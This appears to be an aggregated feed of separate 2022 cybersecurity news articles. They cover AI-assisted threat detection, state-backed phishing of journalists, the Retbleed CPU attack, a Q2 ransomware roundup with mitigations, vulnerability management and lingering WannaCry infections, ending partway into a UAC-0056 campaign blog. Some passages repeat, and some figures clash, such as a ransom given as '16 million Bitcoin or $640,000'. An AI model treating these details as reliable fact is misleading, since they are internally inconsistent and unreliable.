To be truly effective, threat detection and response need to combine the strengths of people and technology.

There is a debate in the world of cybersecurity about whether to use human or machine expertise. However, this is a false dichotomy: Truly effective threat detection and response need both kinds of expertise working in tandem.

It will be years before machines completely replace the humans who perform typical detection and response tasks. What we predict for the meantime is a symbiotic relationship between humans and machines. The combination means that detection of and response to threats can be faster and more intelligent. It leaves humans to focus on what humans do best, while artificial intelligence (AI) shines at tasks better suited for machine processing.

Threat detection is very much an adversarial problem. Attacks rely on stealth, which often makes detection difficult, especially among billions of data points. Technologies we've relied on for the past 20 years are not sufficient to combat threats or sift through the "noise" to find the "signal." Yet skilled humans can find threats that rule-based systems cannot identify.

Any system that uses AI for the next generation of threat detection will need to harness the power of both human and machine expertise and be able to learn and adapt based on human feedback.

**Perfection Is Not the Goal, Human Performance Is**

There's a misconception that AI can't really make decisions, and we need vastly experienced human experts with irreproducible human intuition.

Looking at this through the lens of the classic Turing test, we asked: Can a machine outperform a security analyst in 80% of the work currently done by humans? If the answer is yes, imagine the productivity gains and efficiency for security operations.

We see reason for optimism here. Forty years ago, a chess engine beating a human was unthinkable, but the problem was settled in half that time. Just 10 years ago, automated audio transcription was poor, and humans were better at the task. Now machines can transcribe at least as well as humans.

**Teaming Up for the Best Outcome**

Most companies can't hire enough staff to deal with all of the security alerts. The ideal solution to this talent crunch employs intelligent automation to assist security analysts, incident responders, and threat hunters. There are three main ways to successfully apply security automation:

**1\. Alert triage.** Turning millions of alerts and thousands of events into a handful of actionable cases with context about what happened and why helps prioritize tasks for human workers.

**2\. Incident response.** Automating repetitive tasks reduces the mean time to detect (MTTD) and mean time to respond (MTTR). This frees up human analysts to respond to more important threats and make more effective, immediate decisions.

**3\. Threat detection.** Threat detection is an offensive game, focused on identifying and correlating new threats across the network, different endpoints, and applications while prioritizing actions over alerts. Of the three, this is also the main area for improvement: How can we apply automation _more_ effectively to threat detection?

**Automating Threat Detection**

There are two kinds of automation. The first is replicating simple human actions to build into an AI-driven process. Threat detection, however, is essentially a decision-making process.

The second kind of automation requires us to determine which incidents genuinely require escalation by human security analysts. The current quality of automation technology is clear — in some security operations, machines exceed human accuracy. The goal is to build a decision engine that makes decisions as well as human beings, if not better.

But how can we trust that machine decision-making equals or supersedes human decision-making? Simple. Look at the data!

Automation may mark an alert as an incident that a human security analyst later closes without escalation. Ask them why, and the analyst will walk you through their thought process. Those "whys" are the basis of what we call a factor. Factors that are not immediately obvious may play an important part in the final decision.

The more factors we gather, the sharper the accuracy of both human and machine expertise. Meanwhile, we can also reduce false positives. Every difference between human and machine may uncover additional factors, or human analysts may combine factors in different ways than the automated system.

**Improving the Decision Engine**

A rules engine is limited to modeling just the "bad" qualities or behavior we observe in a pool of data. As a result, it can only identify and respond to incidents that fall within those criteria. In contrast, a decision engine teaches the machine both "bad" and "good" and enables the model to progressively learn.

Mimicking a human's approach to learning and replicating it delivers the same decision, only automated. Hundreds of decisions can be made in just one minute, and resolution time plummets. Instead of running through 20 routine alerts, human analysts could focus their time and energy on one or two actionable cases.

Triage presents thousands of alerts a day. But in threat hunting, the problem is three or four orders of magnitude larger. Hundreds of millions of events mean we're looking for the proverbial needle in a haystack. So how do we apply the same factor analysis approach to threat hunting as we do to alert triage?

Factors can be mapped to each of these hundreds of millions of events with feature engineering. If we extract a given factor, we can apply transformations and reduce the number of different values the factor has (its dimensionality), which is especially useful when dealing with 100 different values or more.

This allows us to map each factor to a score and combine them for a final score, which the AI can use to make decisions. But because there will always be differences in decisions made by human analysts and decision engines, the AI must be able to accept human feedback.

This is supervised algorithmic machine learning in action. Humans provide feedback via labeling, and this input "educates" the system to build a model. It's even possible to build an unsupervised system for tasks that fit it. To work effectively, AI needs to be explainable, customizable, and adaptable.

When we build a decision engine with human expertise and incorporate automation wherever possible, this is what the next generation of SOC technology will look like.

The Next Generation of Threat Detection Will Require Both Human and Machine Expertise

Nation-state hacking groups aligned with China, Iran, North Korea, and Turkey have been targeting journalists to conduct espionage and spread malware as part of a series of campaigns since early 2021.
"Most commonly, phishing attacks targeting journalists are used for espionage or to gain key insights into the inner workings of another government, company, or other area of state-designated

Nation-state hacking groups aligned with China, Iran, North Korea, and Turkey have been targeting journalists to conduct espionage and spread malware as part of a series of campaigns since early 2021.

"Most commonly, phishing attacks targeting journalists are used for espionage or to gain key insights into the inner workings of another government, company, or other area of state-designated import," Proofpoint said in a report shared with The Hacker News.

The ultimate goal of the intrusions, the enterprise security firm said, is to gain a competitive intelligence edge or spread disinformation and propaganda.

Proofpoint said it identified two Chinese hacking groups, TA412 (aka Zirconium or Judgment Panda) and TA459, targeting media personnel with malicious emails containing web beacons and weaponized documents respectively that were used to amass information about the recipients' network environments and drop Chinoxy malware.

In a similar vein, the North Korea-affiliated Lazarus Group (aka TA404) targeted an unnamed U.S.-based media organization with a job offer-themed phishing lure following its critical coverage of supreme leader Kim Jong Un, once again reflective of the threat actor's continued reliance on the technique to further its objectives.

U.S.-based journalists and media have also come under assault from a pro-Turkey hacking group known as TA482, which has been linked to a credential harvesting attack designed to siphon Twitter credentials via bogus landing pages.

"The motivations behind these campaigns \[...\] could include using the compromised accounts to target a journalist's social media contacts, use the accounts for defacement, or to spread propaganda," the researchers theorized.

Lastly, Proofpoint highlighted attempts on the part of multiple Iranian APT actors such as Charming Kitten (aka TA453) by masquerading as journalists to entice academics and policy experts into clicking on malicious links that redirect the targets to credential harvesting domains.

Also joining this list is a threat actor named Tortoiseshell (aka TA456 or Imperial Kitten) that's said to have "routinely" impersonated media organizations like Fox News and the Guardian to send newsletter-themed emails containing web beacons.

The third Iran-aligned adversary to follow an identical approach is TA457, which posed as an "iNews Reporter" to deliver a .NET-based DNS Backdoor to public relations personnel for companies in the U.S., Israel, and Saudi Arabia.

The fact that journalists and media entities have become the locus of attacks is underscored by their ability to offer "unique access and information," making them lucrative targets for intelligence gathering efforts.

"A well-timed, successful attack on a journalist's email account could provide insights into sensitive, budding stories and source identification," the researchers said. "A compromised account could be used to spread disinformation or pro-state propaganda, provide disinformation during times of war or pandemic, or be used to influence a politically charged atmosphere."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

State-Backed Hackers Targeting Journalists in Widespread Espionage Campaigns

By Owais Sultan
Running a business can be challenging for many reasons but having access to modern technology has definitely made…
This is a post from HackRead.com Read the original post: The Importance of Cybersecurity Solutions for Your Business

Running a business can be challenging for many reasons but having access to modern technology has definitely made things easier in this respect. Unfortunately, while modern tech brings with it a host of benefits for businesses, it also brings certain risks such as the threat of cybercrime.

This is why it is so important for all businesses to assess their needs when it comes to cybersecurity solutions. This then enables you to determine the right solutions for your business as well as your budget, which means that you can better protect your business.

There are many reasons why finding the right solutions has become so important over recent years. While security solutions have become more sophisticated these days, so have the methods used by cybercriminals to attack systems and cause devastation to businesses.

Making sure you find the perfect solution to protect your business can make a huge difference in many ways, and it can save you a lot of problems in the future. In this article, we will look at the importance of ensuring you find the right cybersecurity solutions for your business.

**Some of the Benefits of the Right Solution**

As a business owner, you can look forward to many benefits when you have the right solutions in place to protect your business from cyberattacks. Some of these include:

**Protection Against a Range of Issue**

With the right cybersecurity solution, you can protect your business from a range of issues and problems. These days, there are many different types of cyberattacks that are carried out, many of which are targeted at businesses. The right solution can help to ensure you reduce the risk of falling victim to this wide range of issues, and this means that you can better protect your business. 

**Higher Level of Security**

With the right solution, you can benefit from a much higher level of security for your business, and this can save you a lot of stress, headaches, and even money in the long run. While there are basic solutions that you can consider, these are often not adequate to provide the level of security and protection that you need for your business.

However, by finding the right solution that offers comprehensive protection, you can ensure your business has the necessary security in place to avoid cybercrime issues. 

**Peace of Mind**

There are many worries and challenges that business owners have to deal with, and cybersecurity is often high up on this list. The last thing you want is to be worrying constantly about your security solutions and whether your business is properly protected. This can cause unnecessary stress and means that you cannot focus on the actual running of the business.

With the right solution in place, you can benefit from far greater peace of mind, as you can be safe in the knowledge that you have an excellent level of security in place. These are some of the reasons you need to ensure you invest in the right solution. 

**More Cybersecurity Topics**

1.  The Human Factor in Cybersecurity
2.  Brand Protection is Essential for Cybersecurity
3.  How to use AI (Artificial Intelligence) in cybersecurity?
4.  CISA Publishes List of Free Cybersecurity Tools and Services
5.  Mobile Cybersecurity Firm Cirotta Launches Anti-Hacking Phone Cases

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

The Importance of Cybersecurity Solutions for Your Business

"Retbleed" bypasses a commonly used mechanism for protecting against a certain kind of side-channel attack.

Researchers at ETH Zurich have found a way to overcome a commonly used defense mechanism against so-called speculative execution attacks targeting modern microprocessors.

In a technical paper published this week, the researchers described how attackers could use their technique — dubbed "Retbleed" — to steal sensitive data from the memory of systems with Intel and AMD microprocessors that are vulnerable to the issue. The researchers built their proof-of concept code for Linux but said some Windows and Apple computers with the affected microprocessors likely have the issue as well.

Their discovery prompted Intel and AMD to issue advisories this week describing mitigations against the new attack method. In an emailed statement, Intel said it had worked with industry partners, the Linux community, and Virtual Machine Manager (VMM) vendors to make mitigations available to customers. "Windows systems are not affected as they already have these mitigations by default," Intel noted.

AMD said the issue the researchers had identified potentially allows arbitrary speculative code execution under certain microarchitecture conditions. "As part of its ongoing work to identify and respond to new potential security vulnerabilities, AMD is recommending software suppliers consider taking additional steps to help guard against Spectre-like attacks," AMD said in an emailed statement. "That guidance is found in a new AMD whitepaper now available."

Both chipmakers said they were not aware of any active exploits in the wild related to the issue that the researchers at ETH Zurich discovered and reported.

**A Dangerous Attack Vector**

Security researchers consider speculative execution attacks as dangerous because they give attackers a way to access and steal sensitive data — including passwords and encryption keys — in a computer's memory. It's an issue that is especially of concern in shared environments such as public cloud services and shared enterprise infrastructure.

Speculative execution is a performance-enhancing mechanism in modern microprocessors where instructions in code are executed in advance of when they are needed, without waiting for previous instructions to be completed. The technique can help speed up microprocessor performance. If the microprocessor guesses wrong and executes an instruction that is not needed, it discards that instruction. But in doing so, it sometimes leaves artifacts from system memory in the processor's buffers or cache.

Threat actors have taken advantage of this fact to devise so-called side channel attacks where they get the microprocessor to speculatively execute code in such a way as to get it to access — and reveal — sensitive information in the system memory. The issue became a major concern in 2018 with the disclosure of the Spectre and Meltdown vulnerabilities in most microprocessors used in everything from servers to PCs, laptops, and mobile devices.

Since then, chipmakers like Intel and AMD have introduced changes and mitigations to make it harder for adversaries to carry out speculative execution side-channel attacks.

One widely used mitigation against speculative execution attacks is called "Retpoline," a Google-developed approach for controlling how a microprocessor performs speculation when handling certain instructions — so-called indirect "jumps" and "calls".

**'Crazy Trick'**

Retpolines work by replacing indirect jumps and calls with the "return" function, says Johannes Wikner, one of the researchers at ETH Zurich who developed the new exploit. "Retpoline replaces indirect jumps with returns using a crazy trick," Wikner says. "It tricks the processor to believe there has been a 'call' made from the location where the indirect jump was intended to lead."

The motivation for replacing indirect jumps and calls with returns was because the return function was considered impractical to exploit, he says.

But that is not the case, Wikner says. Their research showed that it is possible to trigger microarchitectural conditions on Intel and AMD CPUs that force the return function to be speculatively executed just like was possible with indirect jumps and calls. "Retpoline does not \[consider\] the fact the returns can be exploited, into account," he says. "This allows us to bypass the Retpoline defense."

Wikner says it took the researchers some work to exploit the issue on Intel microprocessors and required their finding a sequence of deep function call stacks to trigger it. "We found on AMD that all returns can be exploited regardless of the function call stack," he says. "We built a framework to make it easy also on Intel."

Bogdan Botezatu, director of threat research at Bitdefender, which last year developed a side-channel attack of its own against Intel CPUs, says Retbleed appears to be a side-channel attack as well one that bypasses a mitigation set in place for Spectre. "This is yet another way in which modern CPUs can be exploited to inadvertently leak information that should be considered secret — and for which hardware defenses are burnt into the silicon," he says.

He says two things are worth mentioning when talking about this type of attack. Conceptually, it beats measures built into chips to prevent data from leaking from one realm to the other. "In the hands of a patient and properly positioned attacker, this vulnerability can exfiltrate important information from shared computers or virtualized servers. This is bad," he says.

**Complex to Execute**

At the same time, such attacks require significant knowledge and logistics to successfully result in exfiltration of the data sought by a potential attacker. High-profile targets should be worried about the existence of this vulnerability and should deploy Intel and AMD's recommended mitigations. "Side-channel attacks are effective, but difficult to execute and exfiltrate exactly that piece of information that attackers are after," Botezatu says.

Intel said that two security advisories it published Tuesday address the research. One of them is here and the other here. The company described the issue as impacting some of its Skylake generation processors that do not have a feature called enhanced Indirect Branch Restricted Speculation (eIBRS). "Intel worked with the Linux community and VMM vendors to provide customers with software mitigations to enable Indirect Branch Restricted Speculation (IBRS), and enhanced Indirect Branch Restricted Speculation (eIBRS) where supported."

Windows systems are not affected because they use IBRS by default, the Intel statement noted.

Researchers Devise New Speculative Execution Attacks Against Some Intel, AMD CPUs

2022 is shaping up to be another banner year for ransomware, which continued to dominate the threat landscape in Q2. 
The post Ransomware rolled through business defenses in Q2 2022 appeared first on Malwarebytes Labs.

Ransomware has given security professionals a headache for the better part of a decade. Fast forward to 2022, and the headache has become a migraine—not just for IT teams but business owners, employees, and customers as well. Over the last three months, ransomware gangs have increased the pressure by multiplying in number and unleashing targeted attacks on vulnerable industries, with disruptions to business operations, million-dollar ransom demands, data exfiltration, and extortion.

The supply chain, already stretched to a breaking point, suffered additional misfortunes across multiple industries, from agriculture and manufacturing to technology and utilities. Governments, nonprofits, and schools—some forced to close their doors—didn’t escape unscathed. And the carnage was not confined to US borders, though it was by far the most affected country. Germany, the UK, and Italy also registered high ransomware tallies.

To understand how we got here, let’s first take a closer look at recent statistics on the top ransomware variants, countries and industries attacked. Next, we’ll evaluate noteworthy attacks month-by-month before discussing whether it’s worth paying the ransom in today’s climate. In addition, we’ll examine current trends to deduce what businesses might expect from ransomware authors in the months to come. Finally, we’ll review mitigation tactics that businesses of all sizes can adopt to keep ransomware at bay.

****Top ransomware variants****

LockBit was the most widely-distributed ransomware in March, April, and May 2022, and its total of 263 spring attacks was more than double the number of Conti, the variant in second place. However, the Conti gang suffered severe setbacks in the wake of its public declaration of support for Russia and subsequent data leaks of its source code, and the group quietly dismantled operations while keeping up appearances. Three groups alleged to be linked to Conti’s disbandment—Black Basta, ALPHV, and Hive—eventually overtook Conti in ransomware distribution by the end of May.

Here’s how the top variants ranked by total number of spring incidents:

1.  LockBit: 263
2.  Conti: 127
3.  Black Cat/ALPHV: 68
4.  Hive: 40
5.  Black Basta: 33\*

\*Black Basta launched in April, so its tally is one month less than the others.

****Top countries****

The United States was by far the most attacked country this spring, with 290 reported ransomware events. Its cyberattack count far surpassed the next two highest countries (Germany and the UK) combined, with the former reporting 48 ransomware incidents and the latter 41.

Here are the top five countries impacted by ransomware this spring:

1.  United States: 290
2.  Germany: 48
3.  UK: 41
4.  Italy: 38
5.  Canada: 31

****Top industries****

Perhaps it might be easier to create a list of industries that weren’t impacted by ransomware in Q2. Services—a catch-all term encompassing service-providing sectors such as transportation, travel, finance, health, education, information, government, and a myriad of other industries—was targeted the most by cybercriminals. However, in a clear bid for the supply chain jugular, threat actors also zeroed in on manufacturing, technology, utilities (including oil), and agriculture.

In fact, the FBI warned the food and agriculture sector (specifically farmers’ co-ops) this April about potential ransomware attacks during critical planting and harvesting seasons that could result in operational disruptions to the supply chain, which could then lead to food shortages. The previous month, HP Hood Dairy suffered a ransomware attack, which was likely behind its Lactaid brand going missing from shelves in early April.

Here’s how the top five industries ranked by number of ransomware attacks this spring:

1.  Services: 171
2.  Manufacturing: 76
3.  Technology: 65
4.  Utilities: 61
5.  Retail: 50

****Noteworthy March attacks****

March was a chaotic month featuring headline-grabbing attacks on tech giants Microsoft and Samsung, as well as automotive titan Toyota, which was forced to halt production across its Japanese plants after a key supplier was compromised. Lapsus$, the criminal enterprise behind Samsung’s infiltration, leaked 190 GB of data and source code reportedly from the Galaxy smart phone, as well as confidential information from Qualcomm.

The most active ransomware variant was LockBit, which registered 97 attacks in March alone, including a hit on tire company Bridgestone Americas that caused the organization to disconnect many of its Latin and North American manufacturing and retreading facilities from the corporate network.

Hive ransomware, a RaaS launched in June 2021, was also busy in March. The group attacked Romania’s petroleum provider, demanding a multi-million dollar ransom and forcing the company to shut down its websites and Fill&Go services at gas stations. Hive also compromised a California healthcare nonprofit later in the month.

****Noteworthy April attacks****

April stood out as the month when three new dangerous RaaS variants, thought to be Conti-affiliated were introduced: Onyx, Mindware, and Black Basta. Conti still had some bite left, however, with 43 reported attacks that month. Among them were industrial giant Parker Hannifin and American automotive tools manufacturer Snap-on, as well as Panasonic’s Canadian operations, from which Conti claimed to have stolen 2.8 GB of data.

Newcomer Black Basta, who carried out 11 attacks in April, made headlines when it compromised German wind turbine company Deutsche Windtechnik and the American Dental Association, which was forced to take affected systems offline. The organization suffered disruptions to online services, telephones, email, and webchat, as well as personal data leaked on its members.

Onyx ransomware, meanwhile, launched with only six attacks in April, but they were deadly. The malware doesn’t just lock up systems and data—it destroys any file larger than 2 MB. Mindware also made a splashy April debut with double extortion threats and 13 attacks, including a Minnesota-based mental health provider from which it pilfered sensitive patient information.

The award for most data stolen in April goes to the Stormous criminal gang, who bragged about an assault resulting in 161 GBs exfiltrated from Coca-Cola without the company knowing. Reports say the Russian-linked threat actors later put it up for sale for 16 million Bitcoin or $640,000.

To add insult to injury, REvil (aka Sodonokibi) appeared to return in April with new payloads and a fresh leak blog featuring a mixture of recent and old victims. The threat actors have been linked to numerous high-profile ransomware incidents, including arguably the biggest ransomware attack of all time—a supply-chain hit on Kaseya in July 2021 believed to have affected over 1,000 businesses.

****Noteworthy May attacks****

In May, government and education were some of the hardest hit verticals, while attacks on Indian airline SpiceJet and farming equipment maker AGCO made the most headlines globally. Black Basta was reportedly behind the AGCO infiltration, which disrupted production of harvesters, tractors, and other business operations. The Austrian state of Carinthia also made the news when the BlackCat gang disrupted their systems and demanded a ransom of $5 million.

Despite strong evidence of a slow-down in activity—just 12 reported incidents in May—Conti made a showy display with a massive, sustained attack against Costa Rica that resulted in its new president declaring a state of emergency on May 8. On the same day, an inflammatory message appeared on the group’s leak site alongside 672 GB of stolen data. In response, the US Department of State offered a $10 million reward for information leading to individuals holding key leadership positions within Conti.

In other May government attacks, the town of Quincy, Massachusetts, had its information service systems compromised. They paid $500,000 for a decryption key and an additional $150,000 for security consultants to assist with the investigation. A ransomware attack in New Jersey’s Somerset County disrupted services and forced employees to shut down computers and create temporary Gmail accounts to ensure the public could still email key departments. The attack marked the 22nd US state or local government to be hit by ransomware in 2022, according to analysts at Recorded Future.

In education, several colleges and K–12 districts were crippled by ransomware. Kellogg Community College in Michigan was forced to cancel classes and close campuses due to a ransomware attack. On May 13, Lincoln College in Illinois permanently closed its doors after 157 years due to the combined effects of the pandemic and a major ransomware incident—a first in ransomware history.

Not to be outdone, LockBit set a steady pace in May with 73 attacks. Thought to have strong ties with Russia, the cybercriminals compromised the Bulgarian Refugee Agency and threatened to release sensitive files. Nearly 230,000 Ukrainian refugees have entered Bulgaria since the start of the war. LockBit was also behind May strikes against electronics manufacturer Foxcomm, the Rio de Janeiro finance department, and one of the largest library services in Germany.

****New ransomware trends****

In recent months, cybercriminals have upped the ransomware ante with further developments in functionality, sophistication, and distribution techniques. As a combined result of the increase in big game hunting (BGH) and remote/hybrid work, threat actors have been encountering ever more complex security infrastructures and a wider variety of devices and platforms.

To penetrate and encrypt as many systems as possible, some threat groups have started writing ransomware code using cross-platform programming languages like Python, Rust, or Golang. This allows the malware to run on different combinations of operating systems and architectures. Both BlackCat and Conti affiliates have been observed distributing versions of their variants for Linux as well as Windows. Developing in a cross-platform language also makes analyzing the malware more difficult for security researchers.

In attack methods, ransomware authors—while still favoring good old-fashioned social engineering—have started backing away from phishing emails and leaning toward exploiting server, software, and operating system vulnerabilities instead. In fact, unpatched vulnerabilities are now the primary vector for ransomware attacks, according to a report by IT software company Ivanti.

Last year, Ivanti identified 65 new vulnerabilities known to have been exploited in ransomware attacks—a number representing nearly one quarter of all vulnerabilities used to drop the threat in the history of its existence. There were 39 percent more vulnerabilities used for ransomware attacks in 2021 than in the previous year, and 2022 is shaping up to be even more tumultuous. From January to May 2022, 22 new vulnerabilities associated with ransomware were found, and all but one are considered critical or high-risk.

What do these trends mean for the year ahead? Cross-platform ransomware has the potential to infect even more systems, some (like Linux) that lack robust anti-ransomware protections. Coding ransomware in this way could eventually take down all endpoints, including IoT and personal devices, in a single blow, rendering recovery operations incredibly difficult—if not outright impossible. Automatic data backups to offsite and/or segmented servers will be key in keeping businesses operational in case of breach.

Meanwhile, ransomware operators are moving to swiftly weaponize vulnerabilities. The average time to exploit is now within eight days of the vulnerability being published by a vendor. That means organizations will need to prioritize patching vulnerabilities associated with ransomware, as well as according to criticality and against their own risk appetites.

****To pay or not to pay****

As ransomware attacks have evolved in sophistication and impact, so too have their ransom demands. Ransoms were 36 percent higher in 2021 than in 2020 at an average of $6.1 million. Yet by spring of 2022, many ransomware authors had whittled away at any sense of trust businesses might have had that by paying the ransom, they’ll receive what’s promised.

In 2020, gangs such as Conti, REvil, and Maze published stolen data even if the ransom was paid. Others took the ransom and never returned the files. By 2021, only 8 percent of those who paid the ransom actually got their files back. At that point, 83 percent of successful attacks featured double or triple extortion schemes. According to a Proofpoint study, 60 percent of participants who opted to negotiate with their attackers ended up having to pay ransom more than once.

By spring 2022, ransomware gangs showed no sense of responsibility toward their victims. RaaS operations, which now dominate the ransomware landscape, tend to be short-lived (therefore reputation isn’t important), and renegade affiliates often fail to follow their operator’s directions. When ransom demands bust the budget, data is not returned or is leaked regardless, and paying up puts a target on your back, it’s probably best to pocket the millions and get to work on mitigations.

****Ransomware mitigations****

To stave off potential future attacks—especially in an era of political and economical instability—the following actions are recommended:

*   Implement regular backups of all data to be stored as air-gapped, password-protected copies offline. Make sure these copies are not accessible for modification or deletion from any system where the original data lives.
*   Administer network segmentation so that all machines on your network are not accessible from every other machine.
*   Install updates/patches to operating systems, software and firmware as soon as they are released.
*   Install and regularly update endpoint security software on all devices—including those used in work-from-home capacities—and enable real-time detection.
*   Audit user accounts with administrative privileges and configure access controls with the least privilege in mind. Implement multifactor authentication (MFA) for additional credential security.
*   Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor for any unusual activity.

For ransomware reviews by the Malwarebytes Threat Intel team, check out the following:

*   March ransomware review
*   April ransomware review
*   May ransomware review
*   June ransomware review

Be ready and resilient in advance of ransomware attacks. Learn more.

_Malwarebytes’ CEO Marcin Kleczynski started the Byte into Security newsletter to provide readers with candid takeaways—and practical solutions—for the most pressing security topics of the day._ _Subscribe to get the CEO perspective sent straight to your inbox_!

Ransomware rolled through business defenses in Q2 2022

Most organizations are flying blind when remediating vulnerabilities. We lack the tooling to secure software fast enough. We need a new approach to vulnerability management now.

In a world increasingly dependent on technology, software sprawl is growing. Companies use custom-built software, open source software, and products from third-party providers when building applications. Through this software supply chain, the digital attack surface expands. Each software dependency can also open it up to potential attack as bugs are found in all types of software that malicious actors can exploit. Certain attacks in the headlines in the last year, including those that impacted SolarWinds and Kaseya, highlight the fragility of the software supply chain and the far-reaching implications if the supply chain is exploited.

Now the federal government is paying attention to software threats. It is now a requirement for companies that want to contract with government agencies to maintain a software bill of materials (SBOM) in order to have a clear and complete inventory of the software an organization has throughout its environment.

In tandem with understanding one's software environment is also the need to find vulnerabilities within that environment. Vulnerability management tools look for specific vulnerabilities and are segmented to specific areas within the various environments where software resides. Some scan for CVEs in the infrastructure, some on containers, and some in OSS libraries.

But there are severe limitations to both of these tools. While SBOM tools have been developed, unfortunately, most require a lot of manual work and are limited to specific parts of the software stack and environment. And while vulnerability scanners may locate bugs, they do not give security teams context that is specific to their own individual environments about how much risk each flaw might pose.

The result is most organizations are still flying blind when it comes to remediating vulnerabilities. Static SBOMs only reveal a point in time view of the software environment. And vulnerability scanners only offer limited information about flaws, with no real "action plan" on how to prioritize and remediate them other than CVE scores, which are of little value in many cases. Tech debt grows, and the attack surface is still massive.

In this software-driven world, we lack the tooling to release secure software — or secure released software — fast enough.

**We Need a New Approach to Vulnerability Management**

With software outpacing the ability of traditional vulnerability management to scan everything, a new approach is needed. The answer? Tools and strategy that allow security and development professionals to see all software across the stack and understand risk holistically.

Here's why.

1.  **Understanding what you have is not enough.** More software and more vulnerabilities are creating huge backlogs for IT. That's why we not only need tools to detect the vulnerabilities associated with the software, but also tools to prioritize these vulnerabilities and understand what matters. Rezilion's research shows that only a small percentage of discovered vulnerabilities are loaded into memory and therefore, exploitable, reducing patching backlogs by up to 85%.
2.  **Context is key.** You must be able to figure out which software and applications will be most affected by vulnerabilities and whether the vulnerability poses a high risk. You also need to know what the attacker will achieve by exploiting the vulnerability and gaining access to your network, and what the impact will be.
3.  **Knowing what vulnerabilities matter doesn't mean you know how to fix them effectively**. Furthermore, remediation has also become more complex with many stakeholders and even more vulnerabilities.

To solve this, security and dev teams need intelligence on how to handle every vulnerability, what packages to upgrade, and to make sure this information is passed to the right stakeholders to make it easy for them to apply patches. This is the future of vulnerability management.

**Detect. Prioritize. Remediate: The New Road Map for Software Attack Surface Management**

The path forward in vulnerability management includes three key stops: Detect. Prioritize. Remediate. If these components sound familiar to you, it's because they're part of a framework called "Attack-Surface Management" that has been successfully applied to assets and networks. This is the strategy needed to expand software security beyond its traditional boundaries of simply scanning for vulnerabilities.

You can arrive at the stops with three capabilities:

**Detect:** A dynamic SBOM to see in real-time into the software environment and identify flaws.

**Prioritize:** A vulnerability prioritization tool to understand which bugs pose an actual risk.

**Remediate:** An automated vulnerability remediation that fixes the critical vulnerabilities.

**Does Your Vulnerability Management Strategy Include the Three Key Elements?**

Ask yourself whether your organization is protected with the traditional approach to vulnerability management using manual tools to find vulnerable software components. Most organizations today are fighting battle that fails to reduce the rapidly growing software attack surface. The best way forward is one that not only identifies bugs but also prioritizes and fixes them quickly and efficiently. That's why new tools and approaches are required in order to truly manage vulnerabilities in today's constantly growing attack surface.

**About the Author**

    

Liran Tancman, CEO and co-founder of Rezilion, is one of the founders of the Israeli cyber command and spent a decade in Israel's intelligence corps. In 2013, Liran co-founded CyActive, a company that built a technology capable of predicting how cyber threats could evolve and offer future-proof security. Liran served as CyActive's CEO and led it from its inception to its acquisition by PayPal in 2015. Following the acquisition, Liran headed PayPal's global Security Products Center responsible for developing cutting-edge technologies to secure PayPal's customers.

The 3 Critical Elements You Need for Vulnerability Management Today

Two mostly defunct threats — WannaCry and NonPetya — top the list of ransomware searches, but does that mean they are still causing problems?

Five years ago, two ransomware programs, WannaCry and NonPetya, used self propagation to spread quickly across the globe, infecting hundreds of thousands of computers, shutting down business operations, and causing billions in damages.

The two programs, often referred to as worms, have refused to die. In a back-of-the-napkin analysis of search terms for common ransomware programs, Canadian IT services and support firm Firewall Technical found that WannaCry and Petya claimed the top and third spot on a list of most searched-for ransomware — at 6,000 and 1,800 monthly searches, respectively — with Ryuk beating out Petya to claim the No. 2 slot, according to data collected from keyword-search tools commonly used by search engine optimization (SEO) firms.

With the Petya searches, it is likely that people are equating Petya with the more damaging NotPetya. People searching for information about Petya are more than likely looking for how to deal with NotPetya, as it has far more effect on everyone, the company says.

Certain other keyword phrases — such as "_X_ decryptor" and "_X_ ransomware removal" — highlighted different trends: "Locky ransomware removal" had a slight lead in monthly searches, and "Cerber decryptor" was the second most common after WannaCry. Arguably, searches for decryptors and removal information are more indicative of infections, according to the support firm's experts.

"Although reports of infections are the best way of detecting threats, monitoring search engine user behavior can give us a clue into both trends and the infections that users are dealing with," a Firewall Technical spokesperson said.

    

Source: Firewall Technical (https://www.firewalltechnical.com)

The fact that two worm-like programs continue to have a long-term impact on systems is not surprising. In its threat update on ransomware, security software firm WithSecure found that WannaCry still accounted for 53% of all detections in 2021 — more than the next four ransomware families combined.

The programs typically embed themselves inside organizations that do not have good visibility into the state of their systems and lack the ability to regularly patch systems, says Neeraj Singh, research and development manager at WithSecure.

"Most of the upstream ... cases that we receive come from the organizations \[that\] do not have the infrastructure to upgrade \[or\] patch operating systems," he says.

Luckily, the worms' impacts are blunted at present. Following a successful infection, WannaCry attempts to connect to a URL and, if successful, does not encrypt the files on the system — a behavior that researcher Marcus Hutchins used to create a kill switch that continues to work to this day.

While NotPetya has no kill switch, current volumes of infections are low enough to make tracking them difficult, according to WithSecure. To date, no new versions of either program have been observed since 2017, the company said.

If WannaCry and NotPetya follow the trajectory of past worm-like threats, they are unlikely to fade away quickly. Four years after the Slammer worm started spreading, for example, the so-called "flash" worm remained the most common network threat. More than a decade after the Conficker worm started spreading in 2008, endpoint security firms continue to block hundreds of thousands of intrusion attempts by infected systems every year.

The data collected by Firewall Tactical also shows the limits of relying on search terms for threat intelligence. Searches for "WannaCry ransomware" were only a sliver of the 201,000 hits in May 2017, when the crypto ransomware worm first appeared, suggesting that the long tail will continue to cause headaches for IT administrators. The 6,000 searches is also a far cry from the more general query for the keyword "WannaCry," which topped 3.4 million that month.

Internet Searches Reveal Surprisingly Prevalent Ransomware

While the war in Ukraine still rages, various threat actors continue to launch cyber attacks against its government entities. In this blog we review the latest campaign from the UAC-0056 threat group.
The post Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign appeared first on Malwarebytes Labs.

_This blog was authored by Roberto Santos and Hossein Jazi_

The Malwarebytes Threat Intelligence team recently reviewed a series of cyber attacks against Ukraine that we attribute with high confidence to UAC-0056 (AKA UNC2589, TA471). This threat group has repeatedly targeted the government entities in Ukraine via phishing campaigns following the same common tactics, techniques and procedures (TTPs).

Lures are based on important matters related to the ongoing war and humanitarian disaster happening in Ukraine. We have been closely monitoring this threat actor and noticed changes in their macro-based documents as well as their final payloads.

In this blog, we will connect the dots between different decoy samples that we and others such as Ukraine CERT have observed. We will also share indicators for a previously undocumented campaign performed by the same threat actor at the end of June.

**Different themes, same techniques**

Since the publication of our blog post _There’s a Go Elephant in the room_, we have tracked several new samples as can be seen in the timeline below:

Figure 1: Relations between different UAC-0056 attributed samples

